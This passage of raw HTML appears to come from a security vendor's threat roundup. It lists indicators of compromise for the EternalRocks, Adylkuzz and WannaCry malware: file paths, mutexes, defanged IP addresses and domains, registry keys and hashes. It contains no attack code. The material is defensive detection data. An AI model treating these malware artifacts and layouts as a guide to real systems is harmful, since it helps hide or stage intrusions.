Updates\SharpZLib\SharpZipLib.nuspec&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net35\JetBrains.Annotations.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net35\JetBrains.Annotations.xml&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net452\fr\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net20\JetBrains.Annotations.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net35\es\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net40\JetBrains.Annotations.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net452\Microsoft.Win32.TaskScheduler.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\package\services\metadata\core-properties\b413d53c92364baa9958fdda02cd8e9a.psmdcp&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\Tor\hidden_service\private_key&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net20\de\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net40\JetBrains.Annotations.xml&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net20\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net35\fr\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net35\Microsoft.Win32.TaskScheduler.XML&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net40\fr\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net40\de\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\PA6YO4MJ\taskscheduler.2.5.23[1].nupkg&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net20\de\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net452\it\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net452\Microsoft.Win32.TaskScheduler.XML&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\Tor\torrc&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net452\JetBrains.Annotations.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\Tor\cached-microdesc-consensus&lt;/li&gt;&lt;li&gt;%System32%\wdi\{ffc42108-4920-4acf-a4fc-8abdcc68ada4}\{125d5171-5282-4ec7-bad7-3e6ee4a208bf}\snapshot.etl&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net35\fr\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\svchost.exe&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net452\JetBrains.Annotations.xml&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net35\JetBrains.Annotations.xml&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net20\Microsoft.Win32.TaskScheduler.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\SharpZLib\package\services\metadata\core-properties\e83d3d4df9744968925840934872efc3.psmdcp&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net452\Microsoft.Win32.TaskScheduler.XML&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\temp\Tor\Data\Tor\geoip&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net35\fr\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler.zip&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\TaskScheduler.nuspec&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net40\Microsoft.Win32.TaskScheduler.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net452\es\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net40\JetBrains.Annotations.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net40\es\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net35\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net35\JetBrains.Annotations.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net20\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net20\JetBrains.Annotations.xml&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net452\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net40\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net20\Microsoft.Win32.TaskScheduler.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\TaskScheduler.nuspec&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\[Content_Types].xml&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net452\Microsoft.Win32.TaskScheduler.XML&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\Tor\cached-certs&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net35\de\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net40\it\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net20\JetBrains.Annotations.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\Tor\hidden_service\hostname&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net452\JetBrains.Annotations.xml&lt;/li&gt;&lt;li&gt;\Users\Administrator\ntuser.dat.LOG1&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net40\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\temp\Tor\Data\Tor\geoip6&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net40\it\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net40\es\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net35\Microsoft.Win32.TaskScheduler.XML&lt;/li&gt;&lt;li&gt;%System32%\config\TxR\{016888cc-6c6f-11de-8d1d-001e0bcde3ec}.TxR.0.regtrans-ms&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net40\it\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\srvsvc&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net452\JetBrains.Annotations.xml&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net40\JetBrains.Annotations.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net20\de\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\SharpZLib\SharpZipLib.nuspec&lt;/li&gt;&lt;li&gt;%SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\7PC6MCEK\sharpziplib.0.86.0[1].nupkg&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net20\Microsoft.Win32.TaskScheduler.XML&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net35\de\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net40\Microsoft.Win32.TaskScheduler.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler.zip&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net20\JetBrains.Annotations.xml&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for SharpZLib.zip\_rels\.rels&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net35\Microsoft.Win32.TaskScheduler.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\[Content_Types].xml&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net20\JetBrains.Annotations.xml&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net40\de\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\SharpZLib.zip&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net20\JetBrains.Annotations.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net452\Microsoft.Win32.TaskScheduler.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net40\Microsoft.Win32.TaskScheduler.XML&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net452\es\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net452\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net20\Microsoft.Win32.TaskScheduler.XML&lt;/li&gt;&lt;li&gt;\TEMP\64442cceb7d618e70c62d461cfaafdb8e653b8d98ac4765a6b3d8fd1ea3bce15.exe&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net20\fr\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net20\es\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net40\Microsoft.Win32.TaskScheduler.XML&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net20\Microsoft.Win32.TaskScheduler.XML&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\TaskScheduler.nuspec&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;64442cceb7d618e70c62d461cfaafdb8e653b8d98ac4765a6b3d8fd1ea3bce15&lt;/li&gt;&lt;li&gt;94189147ba9749fd0f184fe94b345b7385348361480360a59f12adf477f61c97&lt;/li&gt;&lt;li&gt;ad8965e531424cb34120bf0c1b4b98d4ab769bed534d9a36583364e9572332fa&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-V6cub50HJ5A/WShYbcIEE6I/AAAAAAAABBY/Z08thzCMNzw9Mqz4gEHmmvsW93MQyMRhQCLcB/s1600/no-email-security.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1195" data-original-width="1600" height="297" src="https://1.bp.blogspot.com/-V6cub50HJ5A/WShYbcIEE6I/AAAAAAAABBY/Z08thzCMNzw9Mqz4gEHmmvsW93MQyMRhQCLcB/s400/no-email-security.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-FlvBh8WoBDg/WShYu4VAX6I/AAAAAAAABBc/E7_wOJc1fEAUdEbYgiIxifWVyH2R5i-9gCLcB/s1600/Win_Trojan_EternalRocks1_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="416" data-original-width="616" height="216" src="https://3.bp.blogspot.com/-FlvBh8WoBDg/WShYu4VAX6I/AAAAAAAABBc/E7_wOJc1fEAUdEbYgiIxifWVyH2R5i-9gCLcB/s320/Win_Trojan_EternalRocks1_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-hcK1Eymz2hw/WShYywgOy5I/AAAAAAAABBg/pIi00-nam30rkz_-2nmTjkb7nr57bmUiQCLcB/s1600/Win_Trojan_EternalRocks1_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1057" data-original-width="1600" height="263" src="https://4.bp.blogspot.com/-hcK1Eymz2hw/WShYywgOy5I/AAAAAAAABBg/pIi00-nam30rkz_-2nmTjkb7nr57bmUiQCLcB/s400/Win_Trojan_EternalRocks1_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-a3FhhsXx1FY/WShY2yqUraI/AAAAAAAABBk/3nYCinWGoB8Q0e_d8a14oy7zMrMrkxtpACLcB/s1600/Win_Trojan_EternalRocks1_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="731" data-original-width="1600" height="182" src="https://1.bp.blogspot.com/-a3FhhsXx1FY/WShY2yqUraI/AAAAAAAABBk/3nYCinWGoB8Q0e_d8a14oy7zMrMrkxtpACLcB/s400/Win_Trojan_EternalRocks1_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-y-xtF--3a_I/WShY_hOn6-I/AAAAAAAABBo/7V-l5-tSu6Ahe3xzFda1m6k5nQJwB3m8wCLcB/s1600/Win_Trojan_EternalRocks1_malware11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="768" data-original-width="1024" height="300" src="https://4.bp.blogspot.com/-y-xtF--3a_I/WShY_hOn6-I/AAAAAAAABBo/7V-l5-tSu6Ahe3xzFda1m6k5nQJwB3m8wCLcB/s400/Win_Trojan_EternalRocks1_malware11.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Adylkuzz-6317076-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;RasPbFile&lt;/li&gt;&lt;li&gt;Global\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;4[.]14[.]36[.]139&lt;/li&gt;&lt;li&gt;212[.]83[.]129[.]195&lt;/li&gt;&lt;li&gt;52[.]173[.]193[.]166&lt;/li&gt;&lt;li&gt;212[.]129[.]46[.]87&lt;/li&gt;&lt;li&gt;45[.]77[.]28[.]163&lt;/li&gt;&lt;li&gt;112[.]139[.]223[.]108&lt;/li&gt;&lt;li&gt;212[.]129[.]46[.]191&lt;/li&gt;&lt;li&gt;212[.]129[.]44[.]155&lt;/li&gt;&lt;li&gt;212[.]129[.]44[.]157&lt;/li&gt;&lt;li&gt;212[.]129[.]44[.]156&lt;/li&gt;&lt;li&gt;45[.]76[.]51[.]128&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;icanhazip[.]com&lt;/li&gt;&lt;li&gt;aa1[.]super5566[.]com&lt;/li&gt;&lt;li&gt;xmr[.]crypto-pool[.]fr&lt;/li&gt;&lt;li&gt;08[.]super5566[.]com&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%WinDir%\Fonts\wuauser.exe&lt;/li&gt;&lt;li&gt;%WinDir%\Fonts\id.txt&lt;/li&gt;&lt;li&gt;%WinDir%\Temp\s1vs._Miner_.log&lt;/li&gt;&lt;li&gt;%WinDir%\Fonts\msiexev.exe&lt;/li&gt;&lt;li&gt;%WinDir%\Temp\s1vs.1_.exe&lt;/li&gt;&lt;li&gt;%WinDir%\Fonts\history.txt&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;8200755cbedd6f15eecd8207eba534709a01957b172d7a051b9cc4769ddbf233&lt;/li&gt;&lt;li&gt;6f74f7c01503913553b0a6118b0ea198c5a419be86fca4aaae275663806f68f3&lt;/li&gt;&lt;li&gt;d73c9230811f1075d5697679b6007f5c15a90177991e238c5adc3ed55ce04988&lt;/li&gt;&lt;li&gt;51d435cf247b602c104b8d1fb275918c1fa7395a138b26a8aef77b40bf3f09ba&lt;/li&gt;&lt;li&gt;c2d982b902af50dd01f299d2220314000ea319b836af33f8006a813b9b2cfb17&lt;/li&gt;&lt;li&gt;da22bc77a46f2235f6e399a4bb175488bf7d71912f03ff72a34a7515ef13e11b&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-78i0TpRCx2E/WShZKtB8MmI/AAAAAAAABBs/LQ9tt-Z_KnwMMbmQfg4qFY-E_6FpGTwugCLcB/s1600/Win_Trojan_Adylkuzz_6317076_0_amp1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="742" data-original-width="654" height="320" src="https://4.bp.blogspot.com/-78i0TpRCx2E/WShZKtB8MmI/AAAAAAAABBs/LQ9tt-Z_KnwMMbmQfg4qFY-E_6FpGTwugCLcB/s320/Win_Trojan_Adylkuzz_6317076_0_amp1.png" width="282" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-trMzmgUO1OQ/WShZXEJgZjI/AAAAAAAABBw/CS10iVtvYVo3hv85UcBA0_0eFt_xduYrwCLcB/s1600/Win_Trojan_Adylkuzz_6317076_0_threatgrid1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1256" data-original-width="1600" height="313" src="https://2.bp.blogspot.com/-trMzmgUO1OQ/WShZXEJgZjI/AAAAAAAABBw/CS10iVtvYVo3hv85UcBA0_0eFt_xduYrwCLcB/s400/Win_Trojan_Adylkuzz_6317076_0_threatgrid1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-N24NhcoZnYU/WShZcIMnUkI/AAAAAAAABB0/mOLC1mxM9u8DHDWYNH5yNkN7t2F3V_37ACLcB/s1600/Win_Trojan_Adylkuzz_6317076_0_umbrella1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="520" data-original-width="1600" height="130" src="https://4.bp.blogspot.com/-N24NhcoZnYU/WShZcIMnUkI/AAAAAAAABB0/mOLC1mxM9u8DHDWYNH5yNkN7t2F3V_37ACLcB/s400/Win_Trojan_Adylkuzz_6317076_0_umbrella1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-20GmDNhlt1w/WShZg2SENWI/AAAAAAAABB4/fb30Hz5m-t8HYU7neIcVy32daYSMtnWPACLcB/s1600/Win_Trojan_Adylkuzz_6317076_0_umbrella2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="598" data-original-width="1600" height="148" src="https://1.bp.blogspot.com/-20GmDNhlt1w/WShZg2SENWI/AAAAAAAABB4/fb30Hz5m-t8HYU7neIcVy32daYSMtnWPACLcB/s400/Win_Trojan_Adylkuzz_6317076_0_umbrella2.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-phHa6Pu1-Ks/WShZlvdBaHI/AAAAAAAABB8/VmXa6lrz-_8jNeiW2jIr1GP95k2qHMIxgCLcB/s1600/Win_Trojan_Adylkuzz_6317076_0_malware1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="768" data-original-width="1024" height="300" src="https://1.bp.blogspot.com/-phHa6Pu1-Ks/WShZlvdBaHI/AAAAAAAABB8/VmXa6lrz-_8jNeiW2jIr1GP95k2qHMIxgCLcB/s400/Win_Trojan_Adylkuzz_6317076_0_malware1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Ransomware.WannaCry&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\CONTROL PANEL\DESKTOP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;Wallpaper&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\WanaCrypt0r&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\Software\Wow6432Node\WanaCrypt0r&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;MsWinZonesCacheCounterMutexA&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[[.]]com&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%SystemDrive%\b.wnry&lt;/li&gt;&lt;li&gt;%SystemDrive%\c.wnry&lt;/li&gt;&lt;li&gt;%SystemDrive%\r.wnry&lt;/li&gt;&lt;li&gt;%SystemDrive%\s.wnry&lt;/li&gt;&lt;li&gt;%SystemDrive%\taskdl.exe&lt;/li&gt;&lt;li&gt;%SystemDrive%\taskse.exe&lt;/li&gt;&lt;li&gt;%SystemDrive%\t.wnry&lt;/li&gt;&lt;li&gt;%SystemDrive%\u.wnry&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br 